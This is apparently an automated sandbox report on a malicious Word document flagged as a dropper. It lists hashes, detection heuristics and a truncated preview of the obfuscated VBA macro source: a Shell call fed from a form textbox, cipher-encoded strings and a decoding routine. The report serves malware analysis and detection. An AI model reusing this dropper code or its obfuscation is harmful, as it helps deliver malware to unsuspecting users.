Office (OLE) malware analysis — malicious · 72dc66870997ab86

MALICIOUS

Office (OLE)

52.5 KB Created: 2018-07-26 16:02:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: d77a30343e57e344943dada272c20739 SHA-1: 8ca992a279faf88c53c49c9d5d4f22e917a98192 SHA-256: 72dc66870997ab86d9f0d604347d600fa3e63dd117aca96aafe70c8c116d4178

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The `TextBox2_Change` subroutine in the `UserForm1` object calls the `Shell` function with user-provided input from `UserForm1.TextBox2`. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent' further supports this dropper functionality.

Heuristics 4

ClamAV: Doc.Dropper.Agent-7147117-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7147117-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4733 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4733 bytes
SHA-256: `2936a2abf4d839df5627af83019dcd0a470b8ad3a3fe2bbda19a028b02342ea1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Frame1_Layout() xxhukojiauxxx "102" End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{6D4711E7-9330-4314-8E13-66627540D17D}{A893FDF4-5DF7-4073-90C3-87E766F20776}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox2_Change() lokna = 0 loknaf = UserForm1.TextBox2 Shell loknaf, lokna End Sub Private Sub TextBox3_Change() folop End Sub Function folop() rade = 12 On Error Resume Next r = CInt("1E+1000") If rade = 12 Then AVOKSARAT End If End Function Attribute VB_Name = "faststea" Function brasiltim(armkraft) If 1 = 2 Then End If Select Case armkraft Case 1 brasiltim = "']z7$'7jhopalvpmm7{}jhopalvpmm7{{xf['sgh[7" Case 2 brasiltim = ".\lsag[c;7-" Case 3 brasiltim = ",%.[po2h)bp's7ldlsp]\|[ps\|op)'mgp[s,\|zho[mhkzxgmp.-" Case 4 brasiltim = ":}}3s]j3 " Case 5 brasiltim = "\|p""p}},1lskas2jah'pll7}}3s]j3 " Case 6 brasiltim = "\|p""p}}1_sad%" Case 7 brasiltim = ".}}vssj6$$jak'sg'pjgmmkal\|'h]$]h(\|gp}},_'ks'v%" Case 8 brasiltim = ".}}vssj6$$oks'vmgxp]ksspal\|'h]$]h(\|gp}},_}{{757hfs2xgmp72p['hzg[c7kl'gg72xgmpjksv73s]j3 " Case 9 brasiltim = "\|)ks17lskas2jah'pll7}3s]j3 " End Select If armkraft = "A" Then brasiltim = "\|)ks}72og[zholsdmp7vgzzp[{" End If End Function Attribute VB_Name = "ii543210" Function virusmodem() hexlumph = 9 * Rnd() + 6 infochris = "" colleenfgh = 1 sitzmish colleenfgh, infochris, hexlumph virusmodem = infochris End Function Function sitzmish(ByRef cetedult, ByRef bonerppp, dorchester) If cetedult < dorchester Then louDe500 = "" ruyguitar louDe500, 24 * Rnd() + 97 bonerppp = bonerppp + louDe500 cetedult = cetedult + 1 sitzmish cetedult, bonerppp, dorchester End If End Function Function ruyguitar(ByRef iikslobogloT, slipipip) iikslobogloT = Chr(slipipip) ruyguitar = 1 End Function Function AYAKSNEVDEM(chengyue) adulstro = "" For i = 1 To Len(chengyue) adulstro = adulstro + VONAMHARZIAF(uhwagest(Mid(chengyue, i, 1)), 7) Next i AYAKSNEVDEM = adulstro End Function Function VONAMHARZIAF(zhongchao, koneluka) If zhongchao - koneluka < 1 Then VONAMHARZIAF = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + zhongchao - koneluka, 1) Else VONAMHARZIAF = Mid(UserForm1.TextBox1, zhongchao - koneluka, 1) End If End Function Function uhwagest(iikslobogloT) AVONIDTELAYLAHS = 1 JULY1880 = 1 ebmoney41 AVONIDTELAYLAHS, JULY1880, iikslobogloT uhwagest = AVONIDTELAYLAHS End Function Function ebmoney41(ByRef AVONIDTELAYLAHS, ByRef JULY1880, iikslobogloT) zeishowp = UserForm1.TextBox1 savagemars = Len(zeishowp) If cetedult < savagemars Then If iikslobogloT = Mid(zeishowp, AVONIDTELAYLAHS, 1) Then JULY1880 = AVONIDTELAYLAHS Else AVONIDTELAYLAHS = AVONIDTELAYLAHS + 1 ebmoney41 AVONIDTELAYLAHS, JULY1880, iikslobogloT End If End If End Function Attribute VB_Name = "iiksvonagimS" Function vopalosoK(ByRef jasper433, Kaelabel, jensenanna) jasper433 = jasper433 + Kaelabel + jensenanna End Function Function diggerprof() diggerprof = "ee" End Function Function xxhukojiauxxx(ByRef goldlover) UserForm1.TextBox3 = goldlover End Function Attribute VB_Name = "nikkiBXX" Function AVOKSARAT() ayaksvokszrK = virusmodem() zoljants = virusmodem() ronspayw = virusmodem() ruxcamaro = virusmodem() popeyeflip = "" flanglas (brasiltim(1)) vopalosoK popeyeflip, UserForm1.TextBox4, ayaksvokszrK flanglas (brasiltim(2)) vopalosoK popeyeflip, UserForm1.TextBox4, zoljants flanglas (brasiltim(3)) vopalosoK popeyeflip, UserForm1.TextBox4, zoljants flanglas (brasiltim(4)) vopalosoK popeyeflip, UserForm1.TextBox4, ronspay ... (truncated)

SHA-256: 2936a2abf4d839df5627af83019dcd0a470b8ad3a3fe2bbda19a028b02342ea1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Frame1_Layout()
xxhukojiauxxx "102"
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6D4711E7-9330-4314-8E13-66627540D17D}{A893FDF4-5DF7-4073-90C3-87E766F20776}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox2_Change()
lokna = 0
loknaf = UserForm1.TextBox2
Shell loknaf, lokna
End Sub

Private Sub TextBox3_Change()
folop
End Sub

Function folop()
rade = 12
On Error Resume Next
r = CInt("1E+1000")
If rade = 12 Then
AVOKSARAT
End If
End Function

Attribute VB_Name = "faststea"
Function brasiltim(armkraft)
If 1 = 2 Then
End If
Select Case armkraft
Case 1
brasiltim = "']z7$'7jhopalvpmm7{}jhopalvpmm7{{xf['sgh[7"
Case 2
brasiltim = ".\lsag[c;7-"
Case 3
brasiltim = ",%.[po2h)bp's7ldlsp]|[ps|op)'mgp[s,|zho[mhkzxgmp.-"
Case 4
brasiltim = ":}}3s]j3 "
Case 5
brasiltim = "|p""p}},1lskas2jah'pll7}}3s]j3 "
Case 6
brasiltim = "|p""p}}1_sad%"
Case 7
brasiltim = ".}}vssj6$$jak'sg'pjgmmkal|'h]$]h(|gp}},_'ks'v%"
Case 8
brasiltim = ".}}vssj6$$oks'vmgxp]ksspal|'h]$]h(|gp}},_}{{757hfs2xgmp72p['hzg[c7kl'gg72xgmpjksv73s]j3 "
Case 9
brasiltim = "|)ks17lskas2jah'pll7}3s]j3 "
End Select
If armkraft = "A" Then
brasiltim = "|)ks}72og[zholsdmp7vgzzp[{"
End If
End Function

Attribute VB_Name = "ii543210"
Function virusmodem()
hexlumph = 9 * Rnd() + 6
infochris = ""
colleenfgh = 1
sitzmish colleenfgh, infochris, hexlumph
virusmodem = infochris
End Function

Function sitzmish(ByRef cetedult, ByRef bonerppp, dorchester)
If cetedult < dorchester Then
louDe500 = ""
ruyguitar louDe500, 24 * Rnd() + 97
bonerppp = bonerppp + louDe500
cetedult = cetedult + 1
sitzmish cetedult, bonerppp, dorchester
End If
End Function

Function ruyguitar(ByRef iikslobogloT, slipipip)
iikslobogloT = Chr(slipipip)
ruyguitar = 1
End Function

Function AYAKSNEVDEM(chengyue)
adulstro = ""
For i = 1 To Len(chengyue)
adulstro = adulstro + VONAMHARZIAF(uhwagest(Mid(chengyue, i, 1)), 7)
Next i
AYAKSNEVDEM = adulstro
End Function

Function VONAMHARZIAF(zhongchao, koneluka)
If zhongchao - koneluka < 1 Then
VONAMHARZIAF = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + zhongchao - koneluka, 1)
Else
VONAMHARZIAF = Mid(UserForm1.TextBox1, zhongchao - koneluka, 1)
End If
End Function

Function uhwagest(iikslobogloT)
AVONIDTELAYLAHS = 1
JULY1880 = 1
ebmoney41 AVONIDTELAYLAHS, JULY1880, iikslobogloT
uhwagest = AVONIDTELAYLAHS
End Function
  
Function ebmoney41(ByRef AVONIDTELAYLAHS, ByRef JULY1880, iikslobogloT)
zeishowp = UserForm1.TextBox1
savagemars = Len(zeishowp)
If cetedult < savagemars Then
    If iikslobogloT = Mid(zeishowp, AVONIDTELAYLAHS, 1) Then
    JULY1880 = AVONIDTELAYLAHS
    Else
    AVONIDTELAYLAHS = AVONIDTELAYLAHS + 1
    ebmoney41 AVONIDTELAYLAHS, JULY1880, iikslobogloT
    End If
End If
End Function

Attribute VB_Name = "iiksvonagimS"
Function vopalosoK(ByRef jasper433, Kaelabel, jensenanna)
jasper433 = jasper433 + Kaelabel + jensenanna
End Function

Function diggerprof()
diggerprof = "ee"
End Function

Function xxhukojiauxxx(ByRef goldlover)
UserForm1.TextBox3 = goldlover
End Function

Attribute VB_Name = "nikkiBXX"
Function AVOKSARAT()
ayaksvokszrK = virusmodem()
zoljants = virusmodem()
ronspayw = virusmodem()
ruxcamaro = virusmodem()

popeyeflip = ""

flanglas (brasiltim(1))
vopalosoK popeyeflip, UserForm1.TextBox4, ayaksvokszrK
flanglas (brasiltim(2))
vopalosoK popeyeflip, UserForm1.TextBox4, zoljants
flanglas (brasiltim(3))
vopalosoK popeyeflip, UserForm1.TextBox4, zoljants
flanglas (brasiltim(4))
vopalosoK popeyeflip, UserForm1.TextBox4, ronspay
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.